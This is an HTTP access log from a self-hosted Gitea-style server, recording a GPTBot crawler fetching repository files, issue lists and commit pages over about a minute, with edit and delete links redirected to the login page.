"/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.0.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:17:15:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481683] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" -[17/Feb/2026:17:15:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56427] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" -[17/Feb/2026:17:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" -[17/Feb/2026:17:15:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" -[17/Feb/2026:17:15:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:17:15:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/components/Services.tsx" -[17/Feb/2026:17:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19509] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:15:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 19508] [Gzip 6.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:17:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:17:15:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" -[17/Feb/2026:17:15:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:17:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html" -[17/Feb/2026:17:15:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:17:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:15:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:17:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11812] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:17:15:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12001] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:17:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:17:15:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10325] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:16:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 10517] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:17:16:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 11049] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" -[17/Feb/2026:17:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:16:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11379] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11374] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11375] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:17:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 12771] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 20105] [Gzip 6.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:17:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11696] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9794] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 872] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:17:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:17:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fGoldMonitor.spec" [Client 74.7.227.38] [Length 22687] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" -[17/Feb/2026:17:16:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:16:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 874] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/gold_monitor_full.py" [Client 74.7.227.38] [Length 8547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" -[17/Feb/2026:17:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" -[17/Feb/2026:17:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr 